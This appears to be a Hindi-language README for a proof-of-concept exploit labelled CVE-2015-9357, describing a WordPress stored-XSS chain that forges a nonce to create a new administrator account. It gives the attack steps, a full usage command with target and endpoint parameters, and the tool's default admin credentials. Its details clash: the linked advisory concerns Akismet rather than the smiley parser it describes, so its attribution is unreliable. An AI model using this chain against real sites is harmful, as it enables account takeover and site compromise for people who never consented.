
CVE-2015-9357 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: वर्डप्रेस स्माइली पार्सर में स्टोर्ड XSS जो wp_kses को बायपास करता है, एडमिन खाते बनाने के लिए नॉन्स फोर्जरी को चेन करता है। केवल शैक्षिक उपयोग के लिए।
वर्डप्रेस स्माइली/इमोटिकॉन पार्सर में संग्रहित XSS, जाली नॉन्स अनुरोध के माध्यम से एडमिन उपयोगकर्ता निर्माण।
यह इमोटिकॉन regex के माध्यम से <a href> विशेषता संदर्भ से बाहर निकलता है, JS को onerror हैंडलर में डालता है। स्क्रिप्ट टैग की आवश्यकता नहीं, प्रभावित फ़ील्ड पर wp_kses फ़िल्टरिंग से बच जाता है।
श्रृंखला: पेलोड को किसी भी फ़ील्ड पर सबमिट करें जो स्माइली-परिवर्तित होता है, एडमिन इसे देखता है, XSS उनके सत्र में चलता है, user-new.php से create-user nonce प्राप्त करता है, नया एडमिनिस्ट्रेटर खाता पोस्ट करता है, लॉगिन के माध्यम से पुष्टि करें।
केवल प्रयोगशाला/शैक्षिक उपयोग के लिए। लक्ष्य फ़ील्ड को वास्तव में वर्डप्रेस स्माइली रूपांतरण लागू करने की आवश्यकता है, थीम/प्लगइन के अनुसार भिन्न होता है।
मूल भेद्यता प्रकटीकरण: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action <ajax_action> --nonce <nonce> \
--data "name=a,[email protected],phone=a"
--endpoint / --field इस पर निर्भर करते हैं कि कमजोर इनपुट वास्तव में कहाँ रहता है (टिप्पणियाँ, संपर्क फ़ॉर्म, आदि), पहले इसे मैन्युअल रूप से खोजें।
सफलता पर आउटपुट: एडमिन क्रेडेंशियल्स (pwned / Password123!) और wp-admin URL।